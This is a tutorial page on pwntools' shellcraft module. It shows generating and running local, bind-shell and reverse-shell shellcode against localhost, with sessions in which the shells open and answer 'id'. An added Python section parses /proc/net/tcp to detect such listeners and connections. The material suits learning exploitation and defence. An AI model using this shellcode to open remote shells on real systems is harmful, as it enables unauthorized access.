



Pwntools - shellcraft

Architecture                                    Operating system
AArch64, AMD64, ARM, intel80386, MIPS, Thumb    linux, freebsd
  • Before starting the explanation: in the author's view, the shellcode provided by the shellcraft module is in places neither optimized nor efficient.
  • For that reason, care is needed when using shellcraft.

Local Shellcode

Synopsis

shellcraft.i386.linux.sh()

Example

>>> shellcode = shellcraft.i386.linux.sh()
>>> p = run_assembly(shellcode)
[*] '/tmp/pwn-asm-g_qJNW/step3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
[x] Starting local process '/tmp/pwn-asm-g_qJNW/step3'
[+] Starting local process '/tmp/pwn-asm-g_qJNW/step3': pid 42665
>>> p.interactive()
[*] Switching to interactive mode
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
exit
[*] Got EOF while reading in interactive

Bind Shellcode

Synopsis

shellcraft.amd64.linux.bindsh(port, network)

Example

lazenca0x0@ubuntu:~$ python 
Python 2.7.12 (default, Dec  4 2017, 14:50:18) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> shellcode = shellcraft.amd64.linux.bindsh(2345, 'ipv4')
>>> p = run_assembly(shellcode,arch='amd64')
>>> p.wait_for_close()

lazenca0x0@ubuntu:~/Exploit/shellcode$ nc localhost 2345
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

Reverse Shell

Synopsis

shellcraft.i386.linux.connect(host, port, network)
shellcraft.i386.linux.findpeersh(port)

Example

lazenca0x0@ubuntu:~$ python
Python 2.7.12 (default, Dec  4 2017, 14:50:18) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> assembly  = shellcraft.i386.linux.connect('localhost', 2345, 'ipv4')
>>> assembly += shellcraft.i386.linux.findpeersh(2345)
lazenca0x0@ubuntu:~$ nc -lvp 2345
Listening on [0.0.0.0] (family 0, port 2345)
>>> p = run_assembly(assembly)
[*] '/tmp/pwn-asm-Nbw1KJ/step3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
[x] Starting local process '/tmp/pwn-asm-Nbw1KJ/step3'
[+] Starting local process '/tmp/pwn-asm-Nbw1KJ/step3': pid 4144
>>> 
lazenca0x0@ubuntu:~$ nc -lvp 2345
Listening on [0.0.0.0] (family 0, port 2345)
Connection from [127.0.0.1] port 2345 [tcp/*] accepted (family 2, sport 48708)
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
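Both examples above leave a trace that is easy to check from the host side: `bindsh` shows up as a socket in LISTEN state on port 2345, and the `connect` + `findpeersh` payload shows up as an ESTABLISHED connection to the `nc` listener. The following is an added example written for this page, not code from pwntools or from the original article: a small parser for `/proc/net/tcp` that lists listening sockets, flags listeners on ports that are not on an allow-list, and maps a socket inode back to the pid holding it. It assumes a little-endian Linux host (x86/AMD64, as on this page), and the sample `/proc/net/tcp` lines are constructed, not captured; they reuse port 2345 from the examples.

```python
"""Inspect /proc/net/tcp for the sockets that bind and reverse shellcode create.

Added example, not pwntools code. Assumes a little-endian Linux host
(x86/AMD64): the kernel prints IPv4 addresses in host byte order, so the
hex bytes are reversed before formatting them as dotted quads.
"""
import os

# Socket state codes as printed in /proc/net/tcp (include/net/tcp_states.h)
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV",
    "04": "FIN_WAIT1", "05": "FIN_WAIT2", "06": "TIME_WAIT",
    "07": "CLOSE", "08": "CLOSE_WAIT", "09": "LAST_ACK",
    "0A": "LISTEN", "0B": "CLOSING",
}

# Constructed sample (not captured from the page's machine). Row 1 is a
# bindsh listener on port 0x0929 = 2345 owned by uid 1000; row 2 is an
# established connection to it from an ephemeral port (0xBE44 = 48708).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18232 1 0000000000000000 100 0 0 10 0
   1: 00000000:0929 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 43127 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0929 0100007F:BE44 01 00000000:00000000 00:00000000 00000000  1000        0 43130 1 0000000000000000 20 4 30 10 -1
"""


def _decode_addr(field):
    """'0100007F:0929' -> ('127.0.0.1', 2345); bytes are little-endian."""
    ip_hex, port_hex = field.split(":")
    ip = ".".join(str(b) for b in bytes.fromhex(ip_hex)[::-1])
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Return one dict per socket row: local, remote, state, uid, inode."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 10 or parts[0] == "sl":  # skip blanks and the header
            continue
        entries.append({
            "local": _decode_addr(parts[1]),
            "remote": _decode_addr(parts[2]),
            "state": TCP_STATES.get(parts[3], parts[3]),
            "uid": int(parts[7]),
            "inode": int(parts[9]),
        })
    return entries


def listening_sockets(text):
    return [e for e in parse_proc_net_tcp(text) if e["state"] == "LISTEN"]


def established_connections(text):
    return [e for e in parse_proc_net_tcp(text) if e["state"] == "ESTABLISHED"]


def unexpected_listeners(text, expected_ports):
    """Listeners on ports outside the allow-list, e.g. a bind shell on 2345."""
    return [e for e in listening_sockets(text) if e["local"][1] not in expected_ports]


def pids_owning_inode(inode, proc="/proc"):
    """Map a socket inode back to the pids holding it (Linux only, best effort)."""
    owners = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                try:
                    if os.readlink(os.path.join(fd_dir, fd)) == "socket:[%d]" % inode:
                        owners.append(int(pid))
                        break
                except OSError:
                    continue
        except OSError:  # process exited or not our process
            continue
    return owners


if __name__ == "__main__":
    # Use the live table when available, otherwise fall back to the sample.
    try:
        with open("/proc/net/tcp") as f:
            text = f.read()
    except OSError:
        text = SAMPLE_PROC_NET_TCP
    for e in unexpected_listeners(text, {22, 631}):
        ip, port = e["local"]
        print("listener %s:%d uid=%d pids=%s" % (ip, port, e["uid"], pids_owning_inode(e["inode"])))
```

Running it while the `bindsh` example is up reports the 2345 listener together with the pid of the `/tmp/pwn-asm-*/step3` process; while the reverse-shell example is up, `established_connections` shows the connection to the `nc` listener instead. `/proc/net/tcp6` has the same layout with 32-hex-digit addresses, so the same parser applies once `_decode_addr` is taught to format 16-byte addresses.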
